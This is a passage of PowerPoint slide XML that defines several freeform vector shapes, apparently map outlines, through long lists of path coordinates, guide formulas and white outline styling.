                    <a:lnTo>
                      <a:pt x="1" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="186"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36124" name="Freeform 257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2958" y="1922"/>
                <a:ext cx="6" cy="6"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 6"/>
                  <a:gd name="T1" fmla="*/ 6 h 6"/>
                  <a:gd name="T2" fmla="*/ 4 w 6"/>
                  <a:gd name="T3" fmla="*/ 6 h 6"/>
                  <a:gd name="T4" fmla="*/ 4 w 6"/>
                  <a:gd name="T5" fmla="*/ 5 h 6"/>
                  <a:gd name="T6" fmla="*/ 1 w 6"/>
                  <a:gd name="T7" fmla="*/ 6 h 6"/>
                  <a:gd name="T8" fmla="*/ 0 w 6"/>
                  <a:gd name="T9" fmla="*/ 3 h 6"/>
                  <a:gd name="T10" fmla="*/ 0 w 6"/>
                  <a:gd name="T11" fmla="*/ 0 h 6"/>
                  <a:gd name="T12" fmla="*/ 4 w 6"/>
                  <a:gd name="T13" fmla="*/ 4 h 6"/>
                  <a:gd name="T14" fmla="*/ 6 w 6"/>
                  <a:gd name="T15" fmla="*/ 6 h 6"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T21" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T22" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T23" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T24" fmla="*/ 0 w 6"/>
                  <a:gd name="T25" fmla="*/ 0 h 6"/>
                  <a:gd name="T26" fmla="*/ 6 w 6"/>
                  <a:gd name="T27" fmla="*/ 6 h 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6" h="6">
                    <a:moveTo>
                      <a:pt x="6" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36125" name="Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2531" y="2334"/>
                <a:ext cx="191" cy="155"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 191"/>
                  <a:gd name="T1" fmla="*/ 21 h 155"/>
                  <a:gd name="T2" fmla="*/ 180 w 191"/>
                  <a:gd name="T3" fmla="*/ 25 h 155"/>
                  <a:gd name="T4" fmla="*/ 181 w 191"/>
                  <a:gd name="T5" fmla="*/ 40 h 155"/>
                  <a:gd name="T6" fmla="*/ 182 w 191"/>
                  <a:gd name="T7" fmla="*/ 54 h 155"/>
                  <a:gd name="T8" fmla="*/ 190 w 191"/>
                  <a:gd name="T9" fmla="*/ 64 h 155"/>
                  <a:gd name="T10" fmla="*/ 188 w 191"/>
                  <a:gd name="T11" fmla="*/ 74 h 155"/>
                  <a:gd name="T12" fmla="*/ 171 w 191"/>
                  <a:gd name="T13" fmla="*/ 75 h 155"/>
                  <a:gd name="T14" fmla="*/ 161 w 191"/>
                  <a:gd name="T15" fmla="*/ 79 h 155"/>
                  <a:gd name="T16" fmla="*/ 150 w 191"/>
                  <a:gd name="T17" fmla="*/ 82 h 155"/>
                  <a:gd name="T18" fmla="*/ 147 w 191"/>
                  <a:gd name="T19" fmla="*/ 84 h 155"/>
                  <a:gd name="T20" fmla="*/ 150 w 191"/>
                  <a:gd name="T21" fmla="*/ 93 h 155"/>
                  <a:gd name="T22" fmla="*/ 138 w 191"/>
                  <a:gd name="T23" fmla="*/ 101 h 155"/>
                  <a:gd name="T24" fmla="*/ 127 w 191"/>
                  <a:gd name="T25" fmla="*/ 109 h 155"/>
                  <a:gd name="T26" fmla="*/ 119 w 191"/>
                  <a:gd name="T27" fmla="*/ 113 h 155"/>
                  <a:gd name="T28" fmla="*/ 107 w 191"/>
                  <a:gd name="T29" fmla="*/ 115 h 155"/>
                  <a:gd name="T30" fmla="*/ 103 w 191"/>
                  <a:gd name="T31" fmla="*/ 121 h 155"/>
                  <a:gd name="T32" fmla="*/ 87 w 191"/>
                  <a:gd name="T33" fmla="*/ 125 h 155"/>
                  <a:gd name="T34" fmla="*/ 72 w 191"/>
                  <a:gd name="T35" fmla="*/ 136 h 155"/>
                  <a:gd name="T36" fmla="*/ 71 w 191"/>
                  <a:gd name="T37" fmla="*/ 155 h 155"/>
                  <a:gd name="T38" fmla="*/ 49 w 191"/>
                  <a:gd name="T39" fmla="*/ 155 h 155"/>
                  <a:gd name="T40" fmla="*/ 11 w 191"/>
                  <a:gd name="T41" fmla="*/ 155 h 155"/>
                  <a:gd name="T42" fmla="*/ 1 w 191"/>
                  <a:gd name="T43" fmla="*/ 153 h 155"/>
                  <a:gd name="T44" fmla="*/ 7 w 191"/>
                  <a:gd name="T45" fmla="*/ 149 h 155"/>
                  <a:gd name="T46" fmla="*/ 24 w 191"/>
                  <a:gd name="T47" fmla="*/ 143 h 155"/>
                  <a:gd name="T48" fmla="*/ 36 w 191"/>
                  <a:gd name="T49" fmla="*/ 134 h 155"/>
                  <a:gd name="T50" fmla="*/ 52 w 191"/>
                  <a:gd name="T51" fmla="*/ 118 h 155"/>
                  <a:gd name="T52" fmla="*/ 56 w 191"/>
                  <a:gd name="T53" fmla="*/ 108 h 155"/>
                  <a:gd name="T54" fmla="*/ 52 w 191"/>
                  <a:gd name="T55" fmla="*/ 97 h 155"/>
                  <a:gd name="T56" fmla="*/ 52 w 191"/>
                  <a:gd name="T57" fmla="*/ 87 h 155"/>
                  <a:gd name="T58" fmla="*/ 60 w 191"/>
                  <a:gd name="T59" fmla="*/ 75 h 155"/>
                  <a:gd name="T60" fmla="*/ 61 w 191"/>
                  <a:gd name="T61" fmla="*/ 66 h 155"/>
                  <a:gd name="T62" fmla="*/ 71 w 191"/>
                  <a:gd name="T63" fmla="*/ 53 h 155"/>
                  <a:gd name="T64" fmla="*/ 83 w 191"/>
                  <a:gd name="T65" fmla="*/ 46 h 155"/>
                  <a:gd name="T66" fmla="*/ 97 w 191"/>
                  <a:gd name="T67" fmla="*/ 39 h 155"/>
                  <a:gd name="T68" fmla="*/ 105 w 191"/>
                  <a:gd name="T69" fmla="*/ 28 h 155"/>
                  <a:gd name="T70" fmla="*/ 114 w 191"/>
                  <a:gd name="T71" fmla="*/ 3 h 155"/>
                  <a:gd name="T72" fmla="*/ 120 w 191"/>
                  <a:gd name="T73" fmla="*/ 0 h 155"/>
                  <a:gd name="T74" fmla="*/ 126 w 191"/>
                  <a:gd name="T75" fmla="*/ 9 h 155"/>
                  <a:gd name="T76" fmla="*/ 135 w 191"/>
                  <a:gd name="T77" fmla="*/ 14 h 155"/>
                  <a:gd name="T78" fmla="*/ 144 w 191"/>
                  <a:gd name="T79" fmla="*/ 15 h 155"/>
                  <a:gd name="T80" fmla="*/ 157 w 191"/>
                  <a:gd name="T81" fmla="*/ 12 h 155"/>
                  <a:gd name="T82" fmla="*/ 163 w 191"/>
                  <a:gd name="T83" fmla="*/ 14 h 155"/>
                  <a:gd name="T84" fmla="*/ 171 w 191"/>
                  <a:gd name="T85" fmla="*/ 16 h 155"/>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91"/>
                  <a:gd name="T130" fmla="*/ 0 h 155"/>
                  <a:gd name="T131" fmla="*/ 191 w 191"/>
                  <a:gd name="T132" fmla="*/ 155 h 155"/>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91" h="155">
                    <a:moveTo>
                      <a:pt x="173" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="112"/>
                    </a:lnTo>
